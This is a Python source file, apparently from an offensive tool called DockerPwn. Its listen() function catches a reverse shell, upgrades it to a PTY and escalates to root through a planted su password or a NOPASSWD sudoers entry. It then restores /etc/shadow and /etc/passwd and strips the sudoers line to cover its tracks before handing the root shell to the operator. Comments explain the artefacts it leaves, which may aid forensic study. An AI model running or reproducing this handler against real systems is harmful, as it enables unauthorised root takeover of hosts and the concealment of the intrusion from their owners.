#!/usr/bin/python3
import nclib
import time
import os
def listen(c2, method):
    """Wait for an inbound shell on ``c2`` and drive the post-connection steps for ``method``.

    Args:
        c2: ``"host:port"`` string.  Only the first two ``:``-separated fields
            are used; a missing port raises IndexError at the ``int()`` call.
        method: ``'shadowpwn'``, ``'userpwn'`` or ``'chrootpwn'``.  Each branch
            creates its own listener; any other value leaves ``shellListener``
            unbound and the final ``interact()`` call raises NameError.

    Artifacts this function leaves behind (useful when reconstructing a run):
        - ``DockerPwn.log`` is created/truncated in the current directory and
          receives every byte sent and received on the session (``log_send``
          and ``log_recv`` both point at the same handle, which is never closed).
        - ``shell.sh`` in the current directory is removed unconditionally
          before the interactive hand-off (FileNotFoundError if it is absent).
        - Commands are typed into the remote shell in fixed 1.5 s steps; each
          ``b'\\x0D'`` is a carriage return standing in for the Enter key.
    """
    print('[+] Listening for connection - We\'ll automatically escalate to root, and get a PTY.\n')
    print('[!] Session I/O will be logged to ./DockerPwn.log\n')
    hostIP = c2.split(':')[0]
    hostPort = int(c2.split(':')[1])
    # 'wb' truncates any earlier log on every run, so only the latest session survives.
    dockerLog = open('DockerPwn.log', 'wb')
    if method == 'shadowpwn':
        shellListener = nclib.Netcat(listen=(hostIP, hostPort), log_send=dockerLog, log_recv=dockerLog)
        # Upgrade the raw socket shell to a PTY-backed bash so interactive tools (su below) work.
        shellListener.send(bytes('python3 -c \'import pty; pty.spawn("/bin/bash")\'', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        shellListener.send(bytes('export TERM=screen', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        shellListener.send(bytes('su', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        # Password typed at the su prompt; presumably set by an earlier stage of the
        # tool (not in this file) — verify against the caller.
        shellListener.send(bytes('DockerPwn', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        # Restores /etc/shadow and /etc/passwd from the /var/backups copies, presumably
        # undoing an earlier stage's edits.  cp without -p gives both files fresh mtimes,
        # and the backups themselves are left in place.
        shellListener.send(bytes('cp /var/backups/shadow.bak /etc/shadow; cp /var/backups/passwd.bak /etc/passwd', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        # 0x0C is Ctrl-L; readline normally binds it to clear-screen, so the log shows a
        # fresh prompt before the id/hostname/date banner — confirm against DockerPwn.log.
        shellListener.send(b'\x0C')
        shellListener.send(bytes('id; hostname; date;', 'utf-8'))
        shellListener.send(b'\x0D')
    elif method == 'userpwn':
        shellListener = nclib.Netcat(listen=(hostIP, hostPort), log_send=dockerLog, log_recv=dockerLog)
        shellListener.send(bytes('python3 -c \'import pty; pty.spawn("/bin/bash")\'', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        shellListener.send(bytes('export TERM=screen', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        # No password step here: this branch relies on a NOPASSWD sudoers entry for the
        # DockerPwn user (the one the sed below removes).
        shellListener.send(bytes('sudo su', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        # Same shadow/passwd restore as 'shadowpwn', plus removal of the sudoers grant.
        # sed 's/.../g' only blanks the matched text, so an empty line remains in
        # /etc/sudoers, and 'sed -i' rewrites the file (GNU sed replaces the inode) —
        # both are observable after the fact.
        shellListener.send(bytes("cp /var/backups/shadow.bak /etc/shadow; cp /var/backups/passwd.bak /etc/passwd; sed -i 's/DockerPwn ALL=(ALL) NOPASSWD: ALL//g' /etc/sudoers", "utf-8"))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        shellListener.send(b'\x0C')
        shellListener.send(bytes('id; hostname; date', 'utf-8'))
        shellListener.send(b'\x0D')
    elif method == 'chrootpwn':
        # No escalation or cleanup in this branch — only the PTY upgrade and the banner;
        # the method name suggests root was already obtained by an earlier stage (not shown here).
        shellListener = nclib.Netcat(listen=(hostIP, hostPort), log_send=dockerLog, log_recv=dockerLog)
        shellListener.send(bytes('python3 -c \'import pty; pty.spawn("/bin/bash")\'', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        shellListener.send(bytes('export TERM=screen', 'utf-8'))
        shellListener.send(b'\x0D')
        time.sleep(1.5)
        shellListener.send(b'\x0C')
        shellListener.send(bytes('id; hostname; date', 'utf-8'))
        shellListener.send(b'\x0D')
    # Runs for every method, including unrecognised ones; raises if shell.sh is missing.
    os.remove('shell.sh')
    # Hands the session over to the operator's stdin/stdout; dockerLog stays open and
    # keeps recording for the life of the process.
    shellListener.interact()